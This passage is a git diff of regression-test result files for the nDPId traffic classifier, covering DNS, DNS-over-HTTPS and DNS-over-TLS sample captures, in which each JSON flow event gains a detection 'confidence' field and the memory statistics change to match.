-00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124422,"flow_last_seen":1625744124461,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"instagram.faae1-1.fna.fbcdn.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"41.220.158.96"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123764,"flow_last_seen":1625744123792,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123858,"flow_last_seen":1625744123885,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124073,"flow_last_seen":1625744124417,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.QQ","breed":"Fun","category":"Chat"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123828,"flow_last_seen":1625744123853,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123977,"flow_last_seen":1625744124006,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123717,"flow_last_seen":1625744123759,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124010,"flow_last_seen":1625744124069,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123796,"flow_last_seen":1625744123823,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123890,"flow_last_seen":1625744123973,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":87,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124422,"flow_last_seen":1625744124461,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124422,"flow_last_seen":1625744124461,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"instagram.faae1-1.fna.fbcdn.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"41.220.158.96"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123764,"flow_last_seen":1625744123792,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123858,"flow_last_seen":1625744123885,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124073,"flow_last_seen":1625744124417,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123828,"flow_last_seen":1625744123853,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123977,"flow_last_seen":1625744124006,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123717,"flow_last_seen":1625744123759,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124010,"flow_last_seen":1625744124069,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123796,"flow_last_seen":1625744123823,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123890,"flow_last_seen":1625744123973,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":87,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124422,"flow_last_seen":1625744124461,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}}
 00168{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","total-events-serialized":62}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 20/20
@@ -68,9 +68,9 @@
 ~~ total active/idle flows...: 10/10
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4606209 bytes
-~~ total memory freed........: 4606209 bytes
-~~ total allocations/frees...: 99600/99600
+~~ total memory allocated....: 4688210 bytes
+~~ total memory freed........: 4688210 bytes
+~~ total allocations/frees...: 101190/101190
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 173 chars
 ~~ json string max len.......: 894 chars
diff --git a/test/results/dns_doh.pcap.out b/test/results/dns_doh.pcap.out
index 0d791a524..9f4304091 100644
--- a/test/results/dns_doh.pcap.out
+++ b/test/results/dns_doh.pcap.out
@@ -3,9 +3,9 @@
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1571089200789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1571089200789,"pkt":"WkBO7NFkeDHBvV4kCABFAABAAABAAEAGI5asFAoEaBD4+cLVAbuk7FgiAAAAALAC\/\/+OlwAAAgQFtAEDAwYBAQgKHZWyDQAAAAAEAgAA"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1571089200876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1571089200876,"pkt":"eDHBvV4kWkBO7NFkCABFAAA0AAAAADAGc6JoEPj5rBQKBAG7wtXKYdwupOxYI4ASchB+OgAAAgQFFAEBBAIBAwMK"}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1571089200876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1571089200876,"pkt":"WkBO7NFkeDHBvV4kCABFAAAoAABAAEAGI66sFAoEaBD4+cLVAbuk7FgjymHcL1AQEAAggAAA"}
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1571089200789,"flow_last_seen":1571089200878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1571089200878,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1571089200789,"flow_last_seen":1571089200968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":302,"midstream":0,"ts_msec":1571089200968,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1571089200789,"flow_last_seen":1571089204031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":12658,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1571089204031,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1571089200789,"flow_last_seen":1571089200878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1571089200878,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1571089200789,"flow_last_seen":1571089200968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":302,"midstream":0,"ts_msec":1571089200968,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1571089200789,"flow_last_seen":1571089204031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":12658,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1571089204031,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 142/142
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4601037 bytes
-~~ total memory freed........: 4601037 bytes
-~~ total allocations/frees...: 99698/99698
+~~ total memory allocated....: 4685990 bytes
+~~ total memory freed........: 4685990 bytes
+~~ total allocations/frees...: 101288/101288
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 925 chars
-~~ json string avg len.......: 600 chars
+~~ json string max len.......: 951 chars
+~~ json string avg len.......: 612 chars
diff --git a/test/results/dns_dot.pcap.out b/test/results/dns_dot.pcap.out
index 12218932f..56fc8999d 100644
--- a/test/results/dns_dot.pcap.out
+++ b/test/results/dns_dot.pcap.out
@@ -3,9 +3,9 @@
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572783663234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1572783663234,"pkt":"uCfrK5DxCAAnjau+CABFAAA8w6dAAEAGpKPAqAG5CAgICOOyA1VVRPv3AAAAAKAC+vDSnwAAAgQFtAQCCAoqL5UTAAAAAAEDAwc="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572783663269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1572783663269,"pkt":"CAAnjau+uCfrK5DxCABFAAA8cqUAAHcG\/qUICAgIwKgBuQNV47LuO0vYVUT7+KAS6yDKxQAAAgQFZAQCCAqOOwAQKi+VEwEDAwg="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572783663269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1572783663269,"pkt":"uCfrK5DxCAAnjau+CABFAAA0w6hAAEAGpKrAqAG5CAgICOOyA1VVRPv47jtL2YAQAfbSlwAAAQEICiovlTaOOwAQ"}
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572783663234,"flow_last_seen":1572783663269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1572783663269,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01367{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1572783663234,"flow_last_seen":1572783663319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":3267,"flow_avg_l4_payload_len":544,"midstream":0,"ts_msec":1572783663319,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 